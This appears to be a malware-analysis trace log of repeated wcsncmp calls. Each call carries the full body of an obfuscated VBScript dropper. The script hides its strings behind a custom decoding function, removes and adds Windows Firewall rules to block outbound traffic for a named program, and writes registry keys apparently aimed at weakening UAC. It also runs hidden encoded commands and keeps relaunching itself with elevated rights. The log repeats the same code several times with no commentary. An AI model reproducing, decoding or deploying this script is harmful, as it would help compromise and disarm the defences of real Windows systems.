bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.330] wcsncmp (_String1="\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.331] wcsncmp (_String1="\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.331] wcsncmp (_String1="Dim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.331] wcsncmp (_String1="im policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.331] 